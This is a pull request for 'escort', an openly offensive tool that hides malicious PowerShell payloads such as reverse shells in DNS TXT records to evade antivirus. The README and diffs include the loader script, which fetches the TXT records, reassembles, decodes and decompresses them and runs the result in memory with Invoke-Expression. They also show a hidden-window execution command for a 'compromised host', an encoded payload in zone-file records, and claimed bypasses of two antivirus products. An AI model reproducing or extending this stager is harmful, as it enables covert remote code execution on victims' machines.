### PR TITLE
Enable Handling Out Of Ordered Responses

### DIFF
--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
 
 ![](./escort.jpg)
 
-`escort` is an experiment at using DNS TXT records for transmitting malicious payloads to bypass Anti Virus detection. It currently only supports PowerShell payloads (ie reverse shells with powershell) however ideally I will expand this to other potential payload systems. It consists of taking your payload, compressing with DEFLATE and base64 encoding it. If the resultant payload is larger than 255 characters (the maximum limit for DNS TXT records) the payload is broken up into 255 character (or less) segments. When the PowerShell script is ran it will reconstruct the base64 encoded payload, decompress it, and then execute it with the `Invoke-Expression` cmdlet to avoid writing the script to disk.
+`escort` is an experiment at using DNS TXT records for transmitting malicious payloads to bypass Anti Virus detection. It currently only supports PowerShell payloads (ie reverse shells with powershell) however ideally I will expand this to other potential payload systems. It consists of taking your payload, compressing with DEFLATE and base64 encoding it. Because not all DNS servers are equal, some servers may return DNS record values not in the order they are declared in. For example CoreDNS using the BIND zone file format will serve results in the order they are declared in, but AWS Route53 may or may not do this. As such we mark the beginning of the base64 encoded with a segment identifier. We use the `|` character which is not a valid base64 encoded character to mark the end of the segment identifier and the beginning of the base64 encoded segment. Escort uses this information to recombine the bsae64 segments before decoding them. After decoding we decompress the output and execute it with `Invoke-Expression` cmdlet to avoid writing the script to disk
 
 # Usage
 
@@ -13,10 +13,9 @@ $> git clone https://github.com/bonedaddy/escort
 $> cd escort
 $> go build
 $> ./escort --input.file payload.txt compress
-TJFda/JAEIXv318xF3mbXUyWJH5QDRHa0BahqDRCL8SLmAxma4xiRjSo/71svurVDsOZc56Z1aJUYkbgwRTP5mz9gxFBUOSEOzFFEsE+2iLlYuHP/VLJdHvoCHvwLGx7KBzb0Y1er8tdLacjhjvwoLYUH0hB2WPcXa4LwuVqpak3Bw8sIQb9frd/+3+17u45kSkypknwah/xhWHMKrkBlgFVKT4x21DCOZgZgsWvrhaHFIIH7IHfXBQHnIY7bDZ # part 1
-Z4IXES+BPJm9ZtI9ltuE1nsw2TYoKkWoRzOJ1GG2VqcQLVAnO+MmGG8xOZFZj8CB11NrtXAf0eQA6dIAdzjEX85AS1RyDXo8UhMp9SYoLa6TVaFQilmivCon9BbQHFt9HSchaH8My2rq5Tqt9T095wvjdbf7ET/c5Mv7vNwAA//8= # part 2
+0|TJFda/JAEIXv318xF3mbXUyWJH5QDRHa0BahqDRCL8SLmAxma4xiRjSo/71svurVDsOZc56Z1aJUYkbgwRTP5mz9gxFBUOSEOzFFEsE+2iLlYuHP/VLJdHvoCHvwLGx7KBzb0Y1er8tdLacjhjvwoLYUH0hB2WPcXa4LwuVqpak3Bw8sIQb9frd/+3+17u45kSkypknwah/xhWHMKrkBlgFVKT4x21DCOZgZgsWvrhaHFIIH7IHfXBQHnI
+1|Y7bDZZ4IXES+BPJm9ZtI9ltuE1nsw2TYoKkWoRzOJ1GG2VqcQLVAnO+MmGG8xOZFZj8CB11NrtXAf0eQA6dIAdzjEX85AS1RyDXo8UhMp9SYoLa6TVaFQilmivCon9BbQHFt9HSchaH8My2rq5Tqt9T095wvjdbf7ET/c5Mv7vNwAA//8
 ```
-
 You then want to add these values to your DNS host in order. For example in BIND zone files you would add this as follows:
 
 ```bind
@@ -32,8 +31,8 @@ $ORIGIN example.org.
 	3600 IN NS a.iana-servers.net.
 	3600 IN NS b.iana-servers.net.
 
-test4   IN TXT   "TJFda/JAEIXv318xF3mbXUyWJH5QDRHa0BahqDRCL8SLmAxma4xiRjSo/71svurVDsOZc56Z1aJUYkbgwRTP5mz9gxFBUOSEOzFFEsE+2iLlYuHP/VLJdHvoCHvwLGx7KBzb0Y1er8tdLacjhjvwoLYUH0hB2WPcXa4LwuVqpak3Bw8sIQb9frd/+3+17u45kSkypknwah/xhWHMKrkBlgFVKT4x21DCOZgZgsWvrhaHFIIH7IHfXBQHnIY7bDZ"
-test4   IN TXT   "Z4IXES+BPJm9ZtI9ltuE1nsw2TYoKkWoRzOJ1GG2VqcQLVAnO+MmGG8xOZFZj8CB11NrtXAf0eQA6dIAdzjEX85AS1RyDXo8UhMp9SYoLa6TVaFQilmivCon9BbQHFt9HSchaH8My2rq5Tqt9T095wvjdbf7ET/c5Mv7vNwAA//8="
+test4   IN TXT   "0|TJFda/JAEIXv318xF3mbXUyWJH5QDRHa0BahqDRCL8SLmAxma4xiRjSo/71svurVDsOZc56Z1aJUYkbgwRTP5mz9gxFBUOSEOzFFEsE+2iLlYuHP/VLJdHvoCHvwLGx7KBzb0Y1er8tdLacjhjvwoLYUH0hB2WPcXa4LwuVqpak3Bw8sIQb9frd/+3+17u45kSkypknwah/xhWHMKrkBlgFVKT4x21DCOZgZgsWvrhaHFIIH7IHfXBQHnI
+test4   IN TXT   "1|Y7bDZZ4IXES+BPJm9ZtI9ltuE1nsw2TYoKkWoRzOJ1GG2VqcQLVAnO+MmGG8xOZFZj8CB11NrtXAf0eQA6dIAdzjEX85AS1RyDXo8UhMp9SYoLa6TVaFQilmivCon9BbQHFt9HSchaH8My2rq5Tqt9T095wvjdbf7ET/c5Mv7vNwAA//8"
 ```
 
 On the compromised host you would run `escort.ps1` using one of the following:
@@ -45,12 +44,16 @@ $> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -Wi
 
 This will query the host `test4.example.org` for TXT records and use that to construct the payload.
 
-
 # Caveats
 
 * Due to the usage of DEFLATE the powershell script you are compressing and base64 encoding must be a minimum of 45 characters in length, otherwise you should skip the deflate process as this will just increase the size of your payload, however this will require modifying `escort.ps1` as it expects a base64 encoded DEFLATE compressed payload.
-* I haven't actually tested if this evades antivirus detection yet, but that will be done shortly.
+* This may not evade all antiviruses, known AV solutions I have tested against are listed below
 
+
+| AV Name | Successfully Bypasses |
+|---------|-----------------------|
+| Avira Free | Yes |
+| MalwareBytes Free | Yes |
 # Notes
 
 Brotli offers the best compression of data, however it doesn't appear to be widely supported on Windows unless .NET version >=4.5 is installed so it is temporarily not being used.

--- a/escort.ps1
+++ b/escort.ps1
@@ -21,7 +21,7 @@ for ($i=0; $i -lt $ordered_parts.length; $i++) {
 }
 
 # uncomment to debug
-Write-Host $base64_output
+# Write-Host $base64_output
 
 $data = [System.Convert]::FromBase64String($base64_output)
 $ms = New-Object System.IO.MemoryStream

--- a/escort.ps1
+++ b/escort.ps1
@@ -11,8 +11,11 @@ $ordered_parts = New-Object string[] $dns_result.Strings.length
 
 # order the base64 encoded segments correctly
 for ($i=0; $i -lt $dns_result.Strings.length; $i++) {
-    # split the result using the first part as the array index and the second part as the value
-    $ordered_parts[$dns_result.Strings[$i].split("|")[0]] = $dns_result.Strings[$i].split("|")[1]
+    # make sure the string is not empty
+    if (![string]::IsNullOrEmpty($dns_result.Strings[$i])) {
+        # split the result using the first part as the array index and the second part as the value
+        $ordered_parts[$dns_result.Strings[$i].split("|")[0]] = $dns_result.Strings[$i].split("|")[1]
+    }
 }
 
 $base64_output = ''

--- a/escort.ps1
+++ b/escort.ps1
@@ -7,22 +7,28 @@ param (
 )
 
 $dns_result = Resolve-DnsName -Name $host_name -Type TXT -Server $dns_server | Select-Object Strings
-$base64_output = ''
-$deconstructed_query = ''
+$ordered_parts = New-Object string[] $dns_result.Strings.length
 
-# reconstruct the output
+# order the base64 encoded segments correctly
 for ($i=0; $i -lt $dns_result.Strings.length; $i++) {
-    $base64_output += $dns_result.Strings[$i]
+    # split the result using the first part as the array index and the second part as the value
+    $ordered_parts[$dns_result.Strings.split("|")[0]] = $dns_result.Strings.split("|")[1]
+}
+
+$base64_output = ''
+for ($i=0; $i -lt $ordered_parts.length; $i++) {
+    $base64_output += $ordered_parts[$i]
 }
 
 # uncomment to debug
-# Write-Host $base64_output
+Write-Host $base64_output
 
 $data = [System.Convert]::FromBase64String($base64_output)
 $ms = New-Object System.IO.MemoryStream
 $ms.Write($data, 0, $data.Length)
 $ms.Seek(0,0) | Out-Null
 $sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
+$deconstructed_query = ''
 while ($line = $sr.ReadLine()) {  
     $deconstructed_query += $line
 }

--- a/escort.ps1
+++ b/escort.ps1
@@ -12,7 +12,7 @@ $ordered_parts = New-Object string[] $dns_result.Strings.length
 # order the base64 encoded segments correctly
 for ($i=0; $i -lt $dns_result.Strings.length; $i++) {
     # split the result using the first part as the array index and the second part as the value
-    $ordered_parts[$dns_result.Strings.split("|")[0]] = $dns_result.Strings.split("|")[1]
+    $ordered_parts[$dns_result.Strings[$i].split("|")[0]] = $dns_result.Strings[$i].split("|")[1]
 }
 
 $base64_output = ''

--- a/main.go
+++ b/main.go
@@ -44,9 +44,9 @@ func main() {
 				if err := writer.Close(); err != nil {
 					return err
 				}
-				parts := Chunks(base64.StdEncoding.EncodeToString(buffer.Bytes()), 255)
-				for _, part := range parts {
-					fmt.Println(part)
+				parts := Chunks(base64.StdEncoding.EncodeToString(buffer.Bytes()), 250)
+				for i, part := range parts {
+					fmt.Printf("%v|%s\n", i, part)
 				}
 				return nil
 			},


### PR DESCRIPTION
This should solve issues with DNS servers that return results not necessarily in the order they are declared in. The downside to this is that it adds a signature to the DNS TXT payload in that the order of the base64 segment is specified like so:

```
<order><separator><base64-segment.
```

The current format uses the separate `|`, and while this is a signature given that it is embedded in DNS TXT records, I'm not sure if it would be feasible to block such a signature. One possible mitigation is to allow selection of separators.

Other than this, the only solution that allows handling out-of-ordered responses is to bruteforce combine the various base64-segments and see which one decodes properly. This would be unfeasible with any large payload.

This is currently working but it is causing the following error to be displayed in the powershell window

Closes https://github.com/bonedaddy/escort/issues/2